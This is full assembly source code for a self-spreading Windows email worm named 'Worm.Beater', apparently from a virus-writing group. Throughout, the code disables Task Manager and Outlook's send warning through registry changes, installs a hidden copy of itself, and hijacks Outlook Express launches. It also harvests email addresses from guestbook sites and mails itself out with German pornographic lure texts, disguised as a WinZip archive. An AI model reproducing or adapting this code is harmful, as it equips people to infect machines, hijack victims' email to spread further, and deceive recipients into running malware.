;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Worm.Beater ; ; coded by DiA/rrlf ; ; http://www.vx-dia.de.vu ; ; DiA_hates_machine@gmx.de ; ; ####################################################### ; ; ; ; intro: ; ; Hello and welcome to my first mass mailer worm. Nothin ; ; really special, just for experience and just another ; ; step at my ladder. Already detected by some AV's as ; ; "Bater". Have fun... ; ; ; ; disclaimer: ; ; This is a source code of a workin worm! I am NOT ; ; responsible for any executable file you making with ; ; this! Please don't spread any viruses or worms, and ; ; take care... ; ; ; ; features: ; ; -Disable task manager at execution, by using the ; ; "Image File Execution" trapping method. Simple put ; ; some text, and task manager can't run, how easy can ; ; it be. Enable it by termination. ; ; -Disable Outlook MAPI warning, already seen in other ; ; worms, just manipulating registry. ; ; -Copy worm to System directory under the name "btr.exe" ; ; and set's "hide" attribute. ; ; -Trap Outlook Express using the "Image File Execution" ; ; trapping method. Means that when Outlook Express gets ; ; startet the worm will start too. ; ; -If worm is started somewhere else it shows a "real ; ; fake" message box using "FormatMessageA" API. ; ; -Get it's victim mail addresses from guestbook's by ; ; generating 5 random numbers. Then it looks like ; ; "http://xxxxx.netguestbook.com". Search for "mailto:" ; ; and makes valid mail addresses (replacing HTML code). ; ; -Creates mail from 5 (german - because guestbooks are ; ; most time german) subject's and body's. ; ; -Get attachment name from "www.fuckinfreemovies.com" ; ; (thx for the good job dudes ;)). Means everyday new ; ; attachment names. If this fails it use a static name. ; ; -Send mails using the Simple MAPI. ; ; -Simple payload, on every Friday 13th it show's 100 ; ; times a message box "Beat me! Beat me one more time ; ; please!!" ; ; ; ; assemble: ; ; Make executable with The Flatassembler. ; ; ; ; ####################################################### ; ; DiA/rrlf - 09.03.05 ; ; ;;;;;;;;;;;;;;;;;;;;;;;;; ;********************************************************************************** ;**********beater.asm*****cut*****start******************************************** ;********************************************************************************** include "%fasminc%\win32ax.inc" ;#####beater main code################################### section '.code' code readable writeable executable Beater: mov ebx, 0d ;disable call EnDisableTaskMgr ;task manager STRG+ALT+DEL call DisableMAPIWarn ;disable outlook mapi send warning call InstallWorm ;copy worm to system folder call WhatToDo ;start outlook or show error message? jmp Logon MAPISessionHandle dd ? Logon: invoke MAPILogon,\ ;create mapi session 0,\ 0,\ 0,\ 0,\ 0,\ MAPISessionHandle GetMailAddress: call GetFirstAttachment ;get attachment name from FFM call GetFirstMail ;get first mail address cmp eax, 13666d ;error? jne LetTheRiotBegin invoke InternetCloseHandle,\ ;close handle and get valid book dword [GuestFileHandle] invoke InternetCloseHandle,\ dword [GuestInetHandle] jmp GetMailAddress LetTheRiotBegin: call MakeMailValid ;make a valid mail address cmp dword [VictimMail], "team" je ExitBeater ;dont send mail to team from netguestbook call GetSubjectBody ;get a body & subject invoke MAPISendMail,\ ;send it baby dword [MAPISessionHandle],\ 0,\ Message,\ ;MAPI message structure 0,\ 0 call GetNextMail ;get next mail cmp eax, 13666d je ExitBeater call GetNextAttachment jmp LetTheRiotBegin ExitBeater: invoke MAPILogoff,\ ;close mapi session dword [MAPISessionHandle],\ 0,\ 0,\ 0 invoke InternetCloseHandle,\ dword [GuestFileHandle] invoke InternetCloseHandle,\ dword [GuestInetHandle] invoke InternetCloseHandle,\ dword [AttFileHandle] invoke InternetCloseHandle,\ dword [AttInetHandle] call Payload ;check for payload date mov ebx, 1d ;enable call EnDisableTaskMgr ;task manager invoke ExitProcess,\ 0 ;#####beater main code################################### ;#####en/disable task manager############################ EnDisableTaskMgr: jmp EnDisableTaskMgrGo RegFileExecution db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options",0 RegFileExHandle dd ? RegTaskMgr db "taskmgr.exe",0 RegTaskMgrHandle dd ? RegDebugger db "Debugger",0 RegDisable db "Worm.Beater_DiA/rrlf",0 RegEnable db "",0 EnDisableTaskMgrGo: invoke RegOpenKeyEx,\ ;open key HKEY_LOCAL_MACHINE,\ ;-ebx -> 1 = enable 0 = disable RegFileExecution,\ ;-edx -> Buffer 0,\ ;-ecx -> length KEY_ALL_ACCESS,\ RegFileExHandle cmp eax, 0 jne EnDisableTaskMgrError invoke RegCreateKey,\ ;create key dword [RegFileExHandle],\ RegTaskMgr,\ RegTaskMgrHandle cmp eax, 0 jne EnDisableTaskMgrError cmp ebx, 0 je Disable Enable: mov edx, RegEnable mov ecx, 1d jmp SetValue Disable: mov edx, RegDisable mov ecx, 21d SetValue: invoke RegSetValueEx,\ ;create value "Debugger" dword [RegTaskMgrHandle],\ RegDebugger,\ 0,\ REG_SZ,\ edx,\ ;simply put some text ecx EnDisableTaskMgrError: invoke RegCloseKey,\ ;close key dword [RegTaskMgrHandle] invoke RegCloseKey,\ dword [RegFileExHandle] ret ;#####en/disable task manager############################ ;#####disable mapi warning############################### DisableMAPIWarn: jmp DisableMAPIWarnGo WarnIdentities db "Identities",0 WarnRegHandle dd ? WarnDefaultUserValue db "Default User ID",0 WarnOutlookKey db "\Software\Microsoft\Outlook Express\5.0\Mail",0 WarnDefaultUserID rb 100d WarnDefaultSize db 100d WarnRegHandle2 dd ? WarnMAPI db "Warn on Mapi Send",0 WarnDisable dd 0 DisableMAPIWarnGo: invoke RegOpenKeyEx,\ ;open key HKEY_CURRENT_USER,\ WarnIdentities,\ 0,\ KEY_QUERY_VALUE,\ WarnRegHandle cmp eax, 0 jne DisableMAPIWarnError invoke RegQueryValueEx,\ ;read default user id dword [WarnRegHandle],\ WarnDefaultUserValue,\ 0,\ 0,\ WarnDefaultUserID,\ WarnDefaultSize cmp eax, 0 jne DisableMAPIWarnError invoke lstrcat,\ ;join 2 strings easy way WarnDefaultUserID,\ WarnOutlookKey invoke RegOpenKeyEx,\ ;open next key dword [WarnRegHandle],\ WarnDefaultUserID,\ 0,\ KEY_SET_VALUE,\ WarnRegHandle2 cmp eax, 0 jne DisableMAPIWarnError invoke RegSetValueEx,\ dword [WarnRegHandle2],\ WarnMAPI,\ 0,\ REG_DWORD,\ WarnDisable,\ 4d cmp eax, 0 jne DisableMAPIWarnError invoke RegCloseKey,\ dword [WarnRegHandle2] invoke RegCloseKey,\ ;close key dword [WarnRegHandle] DisableMAPIWarnError: ret ;#####disable mapi warning############################### ;#####install worm####################################### InstallWorm: jmp InstallWormGo WormPath rb 256d WormSystemPath rb 256d InstallWormGo: invoke GetModuleFileName,\ ;get path 0,\ WormPath,\ 256d cmp eax, 0 je InstallWormError invoke GetSystemDirectory,\ ;get system path WormSystemPath,\ 256d cmp eax, 0 je InstallWormError mov dword [WormSystemPath + eax], "\btr" ;make install full path mov dword [WormSystemPath + eax + 4d], ".exe" invoke CopyFile,\ ;copy worm WormPath,\ WormSystemPath,\ TRUE cmp eax, 0 je InstallWormError invoke SetFileAttributes,\ ;hide worm copy WormSystemPath,\ FILE_ATTRIBUTE_HIDDEN InstallWormError: ret ;#####install worm####################################### ;#####start outlook or show error######################## WhatToDo: jmp WhatToDoGo WhatFakeApp db "Beater",0 StartupInfo STARTUPINFO ProcessInfo PROCESS_INFORMATION WhatFakeMsg rb 256d WhatOutlookPath rb 256d WhatToDoGo: invoke GetCommandLine ;get commandline inc eax ;go behind the first " GetEndCmdLine: cmp byte [eax], '"' je HaveEndCmdLine inc eax jmp GetEndCmdLine HaveEndCmdLine: inc eax cmp byte [eax], " " ;is there a parameter? jne ExecuteOutlook ;the exract & execute FakeError: invoke CreateProcess,\ ;run non existing app WhatFakeApp,\ ;just to create error msg 0,\ 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ StartupInfo,\ ProcessInfo invoke GetLastError ;get error handle invoke FormatMessage,\ ;create fake message FORMAT_MESSAGE_FROM_SYSTEM,\ ;greets to Bumblebee for this 0,\ eax,\ ;last error 0,\ WhatFakeMsg,\ 256d,\ 0 invoke MessageBox,\ ;show fake error 0,\ WhatFakeMsg,\ 0,\ MB_ICONERROR mov ebx, 0d ;trap call UnTrapOutlook ;trap outlook jmp WhatToDoError ExecuteOutlook: mov esi, eax mov edi, WhatOutlookPath xor eax, eax CopyOutlookPath: lodsb cmp byte [esi], '"' je HaveOutlookPath stosb jmp CopyOutlookPath HaveOutlookPath: stosb mov ebx, 1d ;untrap call UnTrapOutlook ;untrap to execute invoke CreateProcess,\ ;run outlook WhatOutlookPath,\ 0,\ 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ StartupInfo,\ ProcessInfo cmp eax, 0 ;on error je FakeError ;also show fake error mov ebx, 0d ;trap call UnTrapOutlook ;trap outlook again WhatToDoError: ret ;#####start outlook or show error######################## ;#####un/trap outlook#################################### UnTrapOutlook: jmp UnTrapOutlookGo TrapOutlook db "msimn.exe",0 TrapOutlookHandle dd ? UnTrapOutlookGo: invoke RegOpenKeyEx,\ ;open key HKEY_LOCAL_MACHINE,\ RegFileExecution,\ 0,\ KEY_ALL_ACCESS,\ RegFileExHandle cmp eax, 0 jne UnTrapOutlookError invoke RegCreateKey,\ ;create key dword [RegFileExHandle],\ TrapOutlook,\ TrapOutlookHandle cmp eax, 0 jne UnTrapOutlookError cmp ebx, 1d ;-ebx -> 0 = trap 1 = untrap je Untrap ;-edx -> buffer ;-ecx -> length invoke lstrlen,\ ;get length, the easy way ;) WormSystemPath inc eax ;including the 0 mov edx, WormSystemPath mov ecx, eax jmp TrapIt Untrap: mov edx, RegEnable ;"" mov ecx,1d TrapIt: invoke RegSetValueEx,\ ;"Debugger" dword [TrapOutlookHandle],\ RegDebugger,\ 0,\ REG_SZ,\ edx,\ ;worm path ecx UnTrapOutlookError: invoke RegCloseKey,\ ;close key dword [TrapOutlookHandle] invoke RegCloseKey,\ dword [RegFileExHandle] ret ;#####un/trap outlook#################################### ;#####get first mail address############################# GetFirstMail: jmp GetFirstMailGo GuestConnected dd 0 GuestIdent db "Beater",0 GuestInetHandle dd ? GuestFileHandle dd ? GuestCurrentByte rb 2d GuestBytesRead dd ? MailAddress rb 100d GetFirstMailGo: invoke InternetGetConnectedState,\ ;not connected? dword [GuestConnected],\ ;then no action 0 cmp eax, 1 jne ExitBeater ;simply exit invoke InternetOpen,\ ;get inet handle GuestIdent,\ 0,\ 0,\ 0,\ 0 mov dword [GuestInetHandle], eax cmp eax, 0 je ExitBeater ;no book, no mails, no mm call MakeGuestbookURL ;get url invoke InternetOpenUrl,\ dword [GuestInetHandle],\ GuestbookHTTP,\ ;http://xxxxx.netguestbook.com 0,\ 0,\ 10h,\ ;INTERNET_FLAG_NEED_FILE 0 mov dword [GuestFileHandle], eax cmp eax, 0 je ExitBeater GetFirstStartByte: invoke InternetReadFile,\ ;read byte dword [GuestFileHandle],\ GuestCurrentByte,\ ;just one 1d,\ ;because InetSetFilePtr dont worked GuestBytesRead ;for me, so improve baby :) cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], "t" ;to:je GetSecondStartByte cmp byte [GuestCurrentByte], "/" ;/HTML -> end je CheckFirstEOF cmp byte [GuestCurrentByte], "b" ;invalid -> b>» je CheckFirstInvalid jmp GetFirstStartByte GetSecondStartByte: invoke InternetReadFile,\ ;read next byte dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], "o" je GetThirdStartByte jmp GetFirstStartByte GetThirdStartByte: invoke InternetReadFile,\ ;get last : dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], ":" ;mailto: je HaveFirstMailStart jmp GetFirstStartByte CheckFirstEOF: invoke InternetReadFile,\ dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], "H" ;/HTML je CheckSecondEOF jmp GetFirstStartByte CheckSecondEOF: invoke InternetReadFile,\ ;chek next dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], "T" je GetFirstMailError jmp GetFirstStartByte CheckFirstInvalid: invoke InternetReadFile,\ ;check for invalid sites dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], ">" ;b>» je CheckSecondInvalid jmp GetFirstStartByte CheckSecondInvalid: invoke InternetReadFile,\ dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], "»" ;b>» je GetFirstMailError jmp GetFirstStartByte HaveFirstMailStart: mov edi, MailAddress CopyFirstMail: invoke InternetReadFile,\ ;get byte to copy dword [GuestFileHandle],\ GuestCurrentByte,\ 1d,\ GuestBytesRead cmp eax, 0 je ExitBeater cmp byte [GuestCurrentByte], '"' ;" = end of mail je GetFirstMailReturn mov esi, GuestCurrentByte movsb ;copy byte from esi to edi jmp CopyFirstMail GetFirstMailError: mov eax, 13666d ;set error code GetFirstMailReturn: ret ;#####get first mail address############################# ;#####get next mail address############################## GetNextMail: mov edi, VictimMail ;free buffer mov ecx, 100d mov al, 0 rep stosb mov edi, MailAddress ;free buffer mov ecx, 100d mov al, 0 rep stosb call GetFirstStartByte ;extract mail ret ;#####get next mail address############################## ;#####make random guestbook url########################## MakeGuestbookURL: jmp MakeGuestbookURLGo GuestbookHTTP db "http://" GuestbookCode rb 5d GuestbookNet db ".netguestbook.com/",0 MakeGuestbookURLGo: xor ecx, ecx push ecx mov edi, GuestbookCode GetNextNumber: pop ecx cmp ecx, 5d je HaveGuestbookURL push ecx xor ebx, ebx mov bl, al invoke Sleep,\ ebx ;sleep a little bit invoke GetTickCount ;how long is pc running IsNumberValid: cmp al, 49d ;smaller then "0" jb DigitAdd cmp al, 57d ;greater then "9" ja DigitSub jmp NumberIsValid DigitAdd: add al, 6d ;make it valid jmp IsNumberValid DigitSub: sub al, 6d ;valid jmp IsNumberValid ;check again NumberIsValid: stosb ;save number pop ecx inc ecx push ecx jmp GetNextNumber ;next until 5 HaveGuestbookURL: ret ;#####make random guestbook url########################## ;#####make mail address valid############################ MakeMailValid: jmp MakeMailValidGo VictimMail rb 100d ;who care about size? me not MakeMailValidGo: mov esi, MailAddress ;they use tricks for anti-spam mov edi, VictimMail ;@ = @ . = . FindAt: cmp dword [esi], "@" je HaveAt movsb jmp FindAt HaveAt: mov al, "@" stosb ;set @ add esi, 5d ;go behind ; FindPoint: cmp dword [esi], "." je HavePoint movsb jmp FindPoint HavePoint: mov al, "." stosb add esi, 5d CopyRest: cmp byte [esi], 0 je CopyDone movsb jmp CopyRest CopyDone: ret ;#####make mail address valid############################ ;#####get one of five subjects & bodys################### GetSubjectBody: jmp GetSubjectBodyGo CRLF equ 0Dh,0Ah Subject1 db "WOW!",0 Subject2 db "Schau dir das an...",0 Subject3 db "Super Bilder fuer dich ;)",0 Subject4 db "Nen versautes Geschenk fuer dich!",0 Subject5 db "Picture Set",0 Body1 db "Hi!",CRLF db "bin neulich im internet rumgesurft und habe ne seite gefunden",CRLF db "da gabs ne menge kostenlose porno bilder. Leider hab ich den",CRLF db "namen vergessen... :/",CRLF db "Aber ich habe mir ein paar schon runtergeladen. Ich habs drangehaengt",CRLF db "als selbst-extrahierendes archiv :D",CRLF,CRLF db "na dann, viel spass... ;)",0 Body2 db "Hey",CRLF db "schau was ich für nen saugeiles picture set gefunden habe!!!!",0 Body3 db "Hallo,",CRLF db "na, hat dich die Betreffzeile schon neugierig gemacht?",CRLF db "Wenn ja dann solltest du dir UNBEDINGT die kostenlosen",CRLF db "Bilder anschauen die als Attachment dieser Nachricht folgen.",CRLF,CRLF,CRLF db "(c)2005 by HardcoreBabez",CRLF db "________________________",0 Body4 db "Ich will dir nicht zu viel verraten ;D",CRLF db "Schau dir einfach die Bilder an und sag mir was du davon haeltst!",0 Body5 db "Man schau dir die Bilder Sammlung an...",CRLF db "So etwas wuerd ich auch gern mal erleben!",CRLF,CRLF db "Schoene Grueße, B.",0 GetSubjectBodyGo: invoke GetTickCount cmp al, 51d jb SetSubject1 cmp al, 102d jb SetSubject2 cmp al, 153d jb SetSubject3 cmp al, 204d jb SetSubject4 SetSubject5: mov dword [lpszSubject], Subject5 jmp SetBody SetSubject4: mov dword [lpszSubject], Subject4 jmp SetBody SetSubject3: mov dword [lpszSubject], Subject3 jmp SetBody SetSubject2: mov dword [lpszSubject], Subject2 jmp SetBody SetSubject1: mov dword [lpszSubject], Subject1 SetBody: xor ebx, ebx mov bl, al invoke Sleep,\ ebx invoke GetTickCount cmp al, 51d jb SetBody1 cmp al, 102d jb SetBody2 cmp al, 153d jb SetBody3 cmp al, 204d jb SetBody4 SetBody5: mov dword [lpszNoteText], Body5 jmp HaveMessage SetBody4: mov dword [lpszNoteText], Body4 jmp HaveMessage SetBody3: mov dword [lpszNoteText], Body3 jmp HaveMessage SetBody2: mov dword [lpszNoteText], Body2 jmp HaveMessage SetBody1: mov dword [lpszNoteText], Body1 HaveMessage: ret ;#####get one of five subjects & bodys################### ;#####mapi message structure############################# Message: ulReservedm dd 0 lpszSubject dd 0 ;Subject lpszNoteText dd 0 ;Body lpszMessageType dd 0 lpszDateReceived dd 0 lpszConversationID dd 0 flFlags dd 0 lpOriginator dd Recip2 nRecipCount dd 1 lpRecips dd Recip nFileCount dd 1 lpFiles dd Files Recip: ulReservedr dd 0 ulRecipClass dd 1 lpszName dd 0 ;Name lpszAddress dd VictimMail ;Address ulEIDSize dd 0 lpEntryID dd 0 Recip2: ulReservedr2 dd 0 ulRecipClass2 dd 0 lpszName2 dd 0 lpszAddress2 dd 0 ulEIDSize2 dd 0 lpEntryID2 dd 0 Files: ulReservedf dd 0 flFlags2 dd 0 nPosition dd 0 lpszPathName dd WormPath ;FilePath lpszFileName dd AttachmentName ;FileName lpFileType dd 0 ;#####mapi message structure############################# ;#####get first attachment name########################## GetFirstAttachment: jmp GetFirstAttachmentGo AttIdent db "DiA/rrlf",0 AttInetHandle dd ? AttFFM db "http://www.fuckingfreemovies.com/index.html",0 AttReadFiles dd ? AttFileHandle dd ? AttCurrentByte rb 2d AttSimpleName db "Hot Lebian Picture Set.exe",0 AttNames rb 351d AttachmentName rb 50d GetFirstAttachmentGo: invoke InternetOpen,\ ;open inet AttIdent,\ 0,\ 0,\ 0,\ 0 mov dword [AttInetHandle], eax cmp eax, 0 ;on error set simple name je SetSimpleName invoke InternetOpenUrl,\ ;open site dword [AttInetHandle],\ AttFFM,\ 0,\ 0,\ 10h,\ 0 mov dword [AttFileHandle], eax cmp eax, 0 je SetSimpleName xor esi, esi ;skip unused stuff SkipHeader: ;fuckin InternetSetFilePointer cmp esi, 22995d je ReadAttName invoke InternetReadFile,\ ;read just one byte dword [AttFileHandle],\ ;improve setfilepointer AttCurrentByte,\ 1d,\ AttReadFiles inc esi jmp SkipHeader ReadAttName: invoke InternetReadFile,\ ;read a name dword [AttFileHandle],\ AttNames,\ ;buffer 350d,\ ;maybe long url... AttReadFiles mov esi, AttNames ;extract name FindNameStart: cmp dword [esi], "s=''" je HaveNameStart inc esi jmp FindNameStart HaveNameStart: mov edi, AttachmentName add esi, 8d CopyName: cmp byte [esi], "<" je CopyNameDone movsb jmp CopyName CopyNameDone: mov dword [edi], ".exe" jmp GetFirstAttachmentReturn SetSimpleName: mov dword [lpszFileName], AttSimpleName GetFirstAttachmentReturn: ret ;#####get first attachment name########################## ;#####get next attachment################################ GetNextAttachment: mov edi, AttachmentName ;free buffer mov ecx, 50d mov al, 0 rep stosb call ReadAttName ret ;#####get next attachment################################ ;#####check for payload date & run it#################### Payload: jmp PayloadGo SystemTime SYSTEMTIME PayloadGo: invoke GetSystemTime,\ ;get date SystemTime cmp word [SystemTime.wDayOfWeek], 5d ;friday? jne PayloadDone cmp word [SystemTime.wDay], 13d ;the 13th jne PayloadDone mov esi, 113d ;113 x beat BeatMe: cmp esi, 0 je HaaSweet invoke MessageBox,\ ;show little msgbox 0,\ "Beat me! Beat me one more time please!!",\ "Worm.Beater by DiA/rrlf",\ MB_ICONEXCLAMATION dec esi jmp BeatMe HaaSweet: invoke MessageBox,\ 0,\ "That was nice, no?",\ "D i A / r r l f",\ MB_ICONINFORMATION PayloadDone: ret ;#####check for payload date & run it#################### ;#####needed apis######################################## section '.idata' import data readable writeable library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL",\ wininet, "WININET.DLL",\ mapi32, "MAPI32.DLL" import kernel32,\ GetCommandLine, "GetCommandLineA",\ CreateProcess, "CreateProcessA",\ GetLastError, "GetLastError",\ FormatMessage, "FormatMessageA",\ GetModuleFileName, "GetModuleFileNameA",\ GetSystemDirectory, "GetSystemDirectoryA",\ CopyFile, "CopyFileA",\ SetFileAttributes, "SetFileAttributesA",\ lstrlen, "lstrlenA",\ lstrcat, "lstrcatA",\ Sleep, "Sleep",\ GetTickCount, "GetTickCount",\ GetSystemTime, "GetSystemTime",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCreateKey, "RegCreateKeyA",\ RegSetValueEx, "RegSetValueExA",\ RegCloseKey, "RegCloseKey" import wininet,\ InternetGetConnectedState, "InternetGetConnectedState",\ InternetOpen, "InternetOpenA",\ InternetOpenUrl, "InternetOpenUrlA",\ InternetReadFile, "InternetReadFile",\ InternetCloseHandle, "InternetCloseHandle" import mapi32,\ MAPILogon, "MAPILogon",\ MAPISendMail, "MAPISendMail",\ MAPILogoff, "MAPILogoff" ;#####needed apis######################################## ;#####resources, little bit faked######################## section '.rsrc' resource data readable directory RT_VERSION, versions,\ RT_ICON, icons,\ RT_GROUP_ICON, group_icons resource versions,\ 1,\ LANG_NEUTRAL,\ version_info resource icons,\ 1,\ LANG_NEUTRAL,\ icon_data resource group_icons,\ 17,\ LANG_NEUTRAL,\ main_icon version version_info,\ VOS__WINDOWS32,VFT_APP,VFT2_UNKNOWN,LANG_ENGLISH+SUBLANG_DEFAULT,0,\ "FileDescription", "WinZip Selbst-Extrahierendes Archiv",\ "LegalCopyright", "(c)2005 WinZip",\ "FileVersion", "1.0",\ "OriginalFilename", "NEW_PICTURE_SET_selfextract.exe" icon main_icon,\ icon_data,\ "Beater.ico" ;#####resources, little bit faked######################## ;********************************************************************************** ;**********beater.asm*****cut*****end********************************************** ;**********************************************************************************